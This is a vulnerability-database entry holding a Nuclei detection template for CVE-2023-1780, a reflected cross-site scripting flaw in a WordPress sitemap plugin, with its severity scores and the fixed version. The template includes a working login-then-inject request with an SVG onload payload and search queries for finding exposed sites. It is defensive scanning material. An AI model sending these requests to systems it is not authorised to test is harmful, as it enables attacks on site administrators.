Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-1780
HistoryOct 17, 2023 - 7:20 a.m.

Companion Sitemap Generator < 4.5.3 - Cross-Site Scripting

2023-10-1707:20:28
ProjectDiscovery
github.com
2
companion sitemap generator
cross-site scripting
wordpress
vulnerability
codeermeneer
authenticated
cve
cve2023
wpscan
wp-scan

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

33.1%

The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
id: CVE-2023-1780

info:
  name: Companion Sitemap Generator < 4.5.3 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
  remediation: Fixed in version 4.5.3
  reference:
    - https://wpscan.com/vulnerability/8176308f-f210-4109-9c88-9372415dbed3
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1780
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-1780
    cwe-id: CWE-79
    epss-score: 0.00071
    epss-percentile: 0.30482
    cpe: cpe:2.3:a:codeermeneer:companion_sitemap_generator:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: codeermeneer
    product: companion_sitemap_generator
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/companion-sitemap-generator/
    fofa-query: body=/wp-content/plugins/companion-sitemap-generator/
    publicwww-query: "/wp-content/plugins/companion-sitemap-generator/"
  tags: cve,cve2023,wpscan,wp,wordpress,wp-scan,xss,authenticated,codeermeneer

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/tools.php?page=csg-sitemap&tabbed=%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "re not allowed to view")'
          - 'contains(body_2, "<svg/onload=alert(document.domain)>")'
        condition: and
# digest: 490a00463044022008f87555ca75fc4939314686cecddcc71066602938b9bbf9da682d91e537f6d5022050d03ebc2a2b1a35203a8af4d8add66270d5994ead2582668875a3e8b2184673:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

33.1%